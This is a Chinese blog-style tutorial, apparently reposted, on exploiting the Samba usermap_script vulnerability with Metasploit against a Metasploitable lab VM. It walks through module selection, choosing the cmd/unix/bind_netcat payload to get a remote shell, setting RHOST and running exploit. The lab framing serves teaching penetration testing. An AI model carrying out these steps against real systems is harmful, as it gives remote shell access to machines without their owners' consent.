失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > Metaspliot 控制终端利用Samba漏洞渗透

Metaspliot 控制终端利用Samba漏洞渗透

时间:2022-04-05 13:39:51

相关推荐

Metaspliot 控制终端利用Samba漏洞渗透

Samba简介

Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成,Samba是面向Linux和Unix环境的Windows互操作性套件。它适用于在可能包括Linux、Unix、Windows、macOS及其他操作系统的异构环境下工作的那些人。Samba使用服务器消息块(SMB)协议,Windows系统使用该协议相互联系。使用Samba,你可以让Linux系统将驱动器映射到Windows系统,可以让Windows系统将驱动器映射到Linux系统,不过后者的可能性大得多。Samba让你可以在Linux系统上模拟文件和打印服务。

实验环境

BT5 R1(攻击机):10.10.29.128

Metasploitable_ubuntu:10.10.29.254

前提条件:两台机子能互ping通

实验步骤

1,使用命令msfconsole进入终端控制台接口

2,使用search命令从Metasploit渗透代码中找出攻击Samba服务的模块

找到针对usermap_script安全漏洞的渗透攻击模块名称为multi/samba/usermap_script。

3,运行use multi/samba/usermap_scrip 命令选择此渗透模块

4,通过show payloads 查看该渗透攻击模块相兼容的攻击载荷,执行set payload cmd/unix/bind_netcat 选择bind_netcat,通过netcat攻击在渗透攻击成功后执行shell,并通过netcat绑定在一个监听端口

5,这里采用 cmd/unix/bind_netcat,使用netcat工具在渗透成功后执行Shell,并通过netcat绑定在一个监听端口。

6,设置完攻击载荷,查看需要配置的参数:

7,看到RHOST需要设置,其它选择默认设置,将RHOST设置为靶机IP10.10.29.254

8,输入命令 “exploit”开始执行

查看地址

如果觉得《Metaspliot 控制终端利用Samba漏洞渗透》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。